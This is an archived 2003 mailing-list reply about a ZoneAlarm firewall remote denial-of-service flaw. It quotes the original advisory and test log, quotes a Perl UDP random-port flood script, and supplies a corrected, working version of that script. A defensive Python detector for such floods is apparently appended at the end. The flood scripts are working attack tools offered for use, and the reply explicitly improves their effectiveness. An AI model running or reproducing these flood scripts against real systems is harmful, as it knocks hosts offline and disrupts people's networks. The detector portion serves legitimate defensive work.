Date: Wed, 3 Sep 2003 17:46:36 +0400
From: Igor <sprog@...ine.ru>
To: _6mO_HaCk <hackologyteam@...oo.com>
Subject: Re: ZoneAlarm remote Denial Of Service exploit


Hello _6mO_HaCk,

First of all thank you for this useful discovery.

> for (;;) {
>  $size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
> $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
> $rand x $rand;
>  $port=int(rand 65000) +1;
>  send(DoS, 0, $size, sockaddr_in($port, $iaddr));
> }

You're always sending 0 on random ports. Actually it doesn't matter
what you send but valid packets are taking vsmon more time to
handle.

The string:

 send(DoS, 0, $size, sockaddr_in($port, $iaddr));

is not what you meant and only works in your case since $size is
always zero. Luck. Anyway, the whole 'random' traffic is zero out
there... and why use 'my' if you don't use 'strict'?

send SOCKET,MSG,FLAGS,TO
send SOCKET,MSG,FLAGS

I think what you wanted to write was this:

---ZAD---

#!/usr/bin/perl
use Socket;

print <<Msg;
--- ZoneAlarm Remote DoS Xploit
---
--- Discovered & Coded By _6mO_HaCk
Msg
;

$target = $ARGV[0];
print("\n\n[*] Usage : perl $0 <Target>\n\n"),exit  if(!$target);

inet_aton($target) || die ("[-] Unable to resolve $target");
socket(DoS, PF_INET, SOCK_DGRAM, (getprotobyname('udp'))[2]);
$iaddr = inet_aton("$target");

print "[*] DoSing $target ... wait 1 minute and then CTRL+C to stop\n";

for (;;) {
  $msg=(chr(int(rand(255))) x int(rand(10)) x int(rand(20)) x int(rand(30)));
  $port=int(rand 65000) +1;
  send(DoS,$msg,0, sockaddr_in($port, $iaddr));
}
---End ZAD---


Honestly I didn't expect this from ZoneLabs; it is so lame, so awful
for a firewall, and it shows us all that ZoneLabs didn't test their
software. What should a firewall be tested on first? On the speed of
random packet handling. There are two standard cases: UDP and TCP/IP.
You'd better ask some money out of ZoneLabs - you've done
their job.

It appears that Zone Alarm responds differently to UDP packet content.
Some packets take vsmon more time to handle (so there is a playground
for you when the update is released).

Well anyway if you reverse and take a look inside of zonealarm.exe you will
find out how good it is stuffed, after that both 60% slowdown and
nice loading time (it was improved though) won't amaze you any longer.

What do you expect of a small and colorful ZoneAlarm when Windows RPC
is programmed this way?



_> # Overview : 
_> #
_> # ZoneAlarm is a firewall software
_> # package designed for Microsoft Windows 
_> # operating systems that blocks intrusion 
_> # attempts, trusted by millions, and has 
_> # advanced privacy features like worms, 
_> # Trojan horses, and spyware protection. 
_> # ZoneAlarm is distributed and maintained 
_> # by Zone Labs.http://www.zonelabs.com
_> #
_> # Details :
_> #
_> # ZoneAlarm was found vulnerable to a
_> # serious vulnerability leading to a
_> # remote Denial Of Service condition due 
_> # to failure to handle udp random 
_> # packets, if an attacker sends multiple 
_> # udp packets to multiple ports 0-65000, 
_> # the machine will hang up until the
_> # attacker stop flooding. 
_> #
_> # The following is a remote test done 
_> # under ZoneAlarm version 3.7.202 running 
_> # on windows xp home edition.
_> #
_> # on irc test1 joined running ZoneAlarm
_> # version 3.7.202 with default
_> # installation
_> #
_> # * test1 (test@...251.***.**) has joined #Hackology
_> #
_> # from a linux box :
_> #
_> # [root@...l DoS]# ping 62.251.***.**
_> # PING 62.251.***.** (62.251.***.**) from 
_> # ***.***.**.** : 56(84) bytes of data.
_> #
_> # --- 62.251.***.** ping statistics ---
_> # 7 packets transmitted, 0 received, 100% 
_> # loss, time 6017ms
_> #
_> # on irc
_> #
_> # ->> [test1] PING
_> #
_> # [test1 PING reply]: 1secs
_> #
_> # Host is firewalled and up
_> #
_> # now let's try to dos
_> #
_> # --- ZoneAlarm Remote DoS Xploit
_> # ---
_> # --- Discovered & Coded By _6mO_HaCk
_> #
_> # [*] DoSing 62.251.***.** ... wait 1
_> # minute and then CTRL+C to stop
_> #
_> # [root@...l DoS]#
_> #
_> # after 2 minutes
_> #
_> # * test1 (test@...251.***.**) Quit (Ping timeout)
_> #
_> # I have made the same test on ZoneAlarm 
_> # Pro 4.0 Release running on windows xp
_> # professional and I've got the same 
_> # result.
_> #
_> # Exploit released : 02/09/03
_> #
_> # Vulnerable Versions : ALL
_> #
_> # Operating Systems : ALL Windows
_> #
_> # Successfully Tested on :
_> #
_> # ZoneAlarm version 3.7.202 / windows xp 
_> # home edition / windows 98.
_> #
_> # ZoneAlarm Pro 4.0 Release / windows xp 
_> # professional
_> #
_> # Vendor status : UNKNOWN
_> #
_> # Solution : Shut down ZoneAlarm and wait 
_> # for an update.
_> #
_> # The following is a simple code written 
_> # in perl to demonstrate that, the code 
_> # is clean, it won't eat your cpu usage
_> # and it doesn't need to be run as root 
_> # but you still have to use it at your
_> # own risk and on your own machine or
_> # remotely after you get permission.
_> #
_> # Big thanx go to D|NOOO and frost for 
_> # providing me windows boxes with
_> # zonealarm for testing
_> #
_> # Greetz to ir7ioli, BlooDMASK
_> # Abderrahman@...e-h.org
_> # NRGY, Le_Ro| JT ghosted_ Securma,
_> # anasoft SySiPh, phrack, DeV|L0Ty, 
_> # MajNouN |BiG-LuV| h4ckg1rl and all 
_> # my ppl here in Chicago and in Morocco
_> #
_> # Comments suggestions or additional info 
_> # feel free to contact me at
_> # simo@...youssef.org
_> # _6mO_HaCk@...uxmail.org

_> #!/usr/bin/perl
_> use Socket;

_> system(clear);
_> print "\n";
_> print "--- ZoneAlarm Remote DoS Xploit\n";
_> print "---\n";
_> print "--- Discovered & Coded By _6mO_HaCk\n";
_> print "\n";
_> if(!defined($ARGV[0]))
_> {
_>    &usage
_> }

_> my ($target);
_>  $target=$ARGV[0];

_> my $ia       = inet_aton($target)          || die ("[-] Unable to resolve $target");

_> socket(DoS, PF_INET, SOCK_DGRAM, 17);
_>     $iaddr = inet_aton("$target");

_> print "[*] DoSing $target ... wait 1 minute and then CTRL+C to stop\n";

_> for (;;) {
_>  $size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
_> $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
_> $rand x $rand;
_>  $port=int(rand 65000) +1;
_>  send(DoS, 0, $size, sockaddr_in($port, $iaddr));
_> }
_> sub usage {die("\n\n[*] Usage : perl $0 <Target>\n\n");}




-- 
Golden Telecom Software Department
Best regards,
 Igor                            mailto:sprog@...ine.ru
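A defender-side counterpart to the traffic described in this thread, added here as an example and not part of Igor's or _6mO_HaCk's code: a small Python detector that reads a hypothetical UDP flow log and flags any source that sprays a large number of distinct destination ports within a few seconds, which is the footprint of the random-port flood the post describes. The log format and the sample lines are constructed assumptions.

```python
"""Flag sources whose UDP traffic spreads across many distinct destination
ports inside a short sliding window (the random-port flood pattern).
Assumed log format, constructed for this example:
    "<epoch_seconds> <proto> <src_ip> <dst_port> <bytes>"
"""
from collections import defaultdict

# Constructed sample traffic (not captured from any real host).
SAMPLE_LOG = []
# Benign: 10.0.0.5 sends repeated DNS queries to port 53 over 30 seconds.
for t in range(30):
    SAMPLE_LOG.append(f"{1000 + t} udp 10.0.0.5 53 64")
# Flood-like: 10.0.0.9 hits 300 distinct ports in 1..65000 within 3 seconds.
# A deterministic stand-in for the post's rand(65000): 7919 is coprime with
# 65000, so the ports are all distinct.
for i in range(300):
    SAMPLE_LOG.append(f"{1005 + i // 100} udp 10.0.0.9 {i * 7919 % 65000 + 1} 120")


def parse(line):
    """Split one log line into (ts, proto, src, dport, nbytes)."""
    ts, proto, src, dport, nbytes = line.split()
    return int(ts), proto, src, int(dport), int(nbytes)


def detect_udp_port_spray(lines, window_s=5, min_ports=100):
    """Return {src_ip: max_distinct_ports} for every source that touches at
    least `min_ports` distinct UDP destination ports within some
    `window_s`-second sliding window."""
    events = defaultdict(list)          # src -> [(ts, dport), ...]
    for line in lines:
        ts, proto, src, dport, _ = parse(line)
        if proto == "udp":
            events[src].append((ts, dport))
    hits = {}
    for src, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until it spans <= window_s.
            while evs[end][0] - evs[start][0] > window_s:
                start += 1
            ports = {p for _, p in evs[start:end + 1]}
            if len(ports) >= min_ports:
                hits[src] = max(hits.get(src, 0), len(ports))
    return hits


if __name__ == "__main__":
    print(detect_udp_port_spray(SAMPLE_LOG))   # {'10.0.0.9': 300}
```

Tune `window_s` and `min_ports` to the normal port fan-out of the monitored hosts; a DNS resolver or NTP client stays far below the threshold, while the flood in the post crosses it within its first second.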


